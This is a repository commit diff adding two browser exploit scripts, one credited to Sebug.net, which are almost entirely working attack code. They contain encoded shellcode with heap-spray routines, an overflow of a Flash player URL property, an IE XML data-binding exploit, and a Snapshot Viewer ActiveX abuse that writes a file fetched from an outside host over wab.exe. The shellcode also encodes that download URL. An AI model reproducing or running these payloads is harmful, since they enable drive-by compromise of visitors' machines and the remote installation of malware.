+var shellcode = unescape("%u10eb%u4b5b%uc933%ub966%u029b%u3480%ufe0b%ufae2%u05eb%uebe8%uffff%u17ff%ufcc4%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7f9%u2416%ufeff%u1cfe%ube07%uc67e%u8b3d%u7704%udab8%u9196%ufe90%u96fe%u8c8b%u9392%u94aa%ua7ff%uf875%u5e16%ufeff%u6bfe%u4a16%ufeff%u73fe%uc940%ufeff%ua9fe%u0196%ufefe%u01fe%ufaa8%u39fd%ufe39%u80a2%ud080%ube39%u9bfa%u9b86%ua9fe%ua801%ucdf6%uad25%ua9ad%ub873%uaec6%u01ad%ue2a8%u9294%u9096%u9a8a%uaa92%uff94%u75a7%u16f8%uffa7%ufefe%u1675%ubefd%u75c2%ue2b6%u8675%ufdd2%u9a03%ueb75%ufece%ufefe%u6c75%ufe56%ufefe%u0f96%udbb3%u962b%ub30f%u2bdb%u3796%ua0ac%u01ad%u6aca%ub871%u39d6%ud2b8%u7fb3%uefce%u4696%ufecc%u96fe%uce46%ufefe%u4696%ufed7%u75fe%u6afa%ub99e%uf9c7%ufc8a%u071c%u8077%u9fce%u4696%uffe1%u96fe%ueb46%ufeff%u4696%ufe0e%u75fe%u6afa%uc7b9%u8af9%u1cfc%u7707%uca80%ufe94%u9b96%ucd92%u96cc%u9b95%u908c%u94aa%ua7ff%uf875%u2c16%ufefe%u75fe%ufd26%uc2be%u3e7d%u75e6%u9686%u05fd%u817d%ufeee%u8b8a%ub175%ufdf2%u7f35%u90c7%u9a8a%u8b92%u759d%ufdd1%u7d15%ufe83%u8afe%u75a7%ufebb%uba73%ufce6%u37cd%u40f1%uc4ee%u8a28%u3ff6%uf937%u34fd%u15be%uc50f%ud6b0%ue48b%ud59e%ufdd1%uee91%uaaae%ufa94%ufa94%u01ab%ue6a8%u01a6%uce88%ubb71%u9ffe%ue315%ub0c5%u8bd2%u9ee6%ud1d5%u91fd%uaeee%u94aa%u94fa%uabfa%ua801%ua6e6%u8801%u71ca%ufebb%u7d9f%ufa3b%u5f15%u397d%u15ea%u757b%uea80%u94aa%u94fa%ua981%ua801%u39e6%u96f9%uf4f6%ucdfe%u763e%ufab9%u0275%uec94%u55a7%u031c%u3998%udaba%uffc2%u75ff%u7302%ueeb9%uaea9%uafaf%uafaf%uafaf%u73af%uc978%ufeff%uaefe%ua801%u7ff2%u763a%ufeff%u3cfe%ufede%ua801%u75ee%udaa8%ua5bf%ufdac%ufd1f%ufd1f%ufd1f%u7d1f%ufa12%uada4%u2475%u091c%u01ac%uaf1e%u75a8%uc28b%u8a75%u86d0%u0bfd%u75a8%ude88%u0bfd%u37cd%ubfb7%ufd53%ucd3b%uf125%uee40%u28c4%uf68a%u353f%ufdf9%ube24%u0f15%ue1c5%u198b%u75a0%udaa0%u23fd%u7598%ub5f2%ua075%ufde2%u7523%u75fa%u3bfd%ua055%u3da7%u3f16%u0103%ucc01%u6f8a%uc7f2%u831c%u877d%u18c7%u3766%u5842%u9d95%u2f77%u0eb1%u85b6%ue0c3%u9a5a%u7e11%u5128%ub364%uce7f%ufeef%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%u96fe%u8a8a%uc48e%ud1d1%u8989%ud089%ucd89%ud39d%u8c91%ud099%u919d%ud193%ucd89%ud09d%u869b%ufe9b");
+var hbshelloworld = 0x100000;
+var payLoadSize = shellcode.length * 2;
+var spraySlideSize = hbshelloworld - (payLoadSize+0x38);
+var spraySlide = unescape("%u0c0c%u0c0c");
+
+function getSpraySlide(spraySlide, spraySlideSize) {
+ while (spraySlide.length*2<spraySlideSize) {
+ spraySlide += spraySlide;
+ }
+ spraySlide = spraySlide.substring(0,spraySlideSize/2);
+ return spraySlide;
+}
+
+
+spraySlide = getSpraySlide(spraySlide,spraySlideSize);
+heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;
+memory = new Array();
+for (i=0;i<heapBlocks;i++) {
+ memory[i] = spraySlide + shellcode;
+}
+
+
+var size_buff = 1070;
+var x = unescape("%0c%0c%0c%0c");
+while (x.length<size_buff) x += x;
+gl.FlvPlayerUrl = x;
+}
+
+</SCRIPT>
+<script>
+if (set_cookie == -1){
+location.reload();
+}
+</script>
+
+
+//Sebug.net
@@ -0,0 +1,47 @@
+<SCRIPT language="javascript">
+ var p_url = "http://paksusic.cn/nuc/exe.php";
+function SS()
+{
+try{
+ret=new ActiveXObject("snpvw.Snapshot Viewer Control.1");
+var arbitrary_file = p_url;
+var dest = 'C:/Program Files/Outlook Express/wab.exe';
+document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'></object>");
+attack.SnapshotPath = arbitrary_file;
+setTimeout('window.location = "ldap://127.0.0.1"',2000);
+attack.CompressedPath = dest;
+attack.PrintSnapshot(arbitrary_file,dest);
+}catch(e){}
+}
+function WML()
+{
+document.write('<div id="replace">x</div>');
+var srtkod = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
+"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
+"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
+"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
+"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
+"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
+"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
+"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
+"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
+"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
+"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
+"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
+"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
+"%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u702F%u6B61%u7573%u6973%u2E63%u6E63%u6E2F%u6375%u652F%u6578%u702E%u7068");
+var psrayt = unescape("%u0a0a%u0a0a");
+do {
+ psrayt += psrayt;
+} while(psrayt.length < 0xd0000);
+meray = new Array();
+for(i = 0; i < 100; i++)
+ meray[i] = psrayt + srtkod;
+xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
+tag = document.getElementById("replace");
+tag.innerHTML = xmlcode;
+}
+
+if (WML()||SS()) { }
+</script>
+
Oops, something went wrong.

0 comments on commit 82c455d

Please sign in to comment.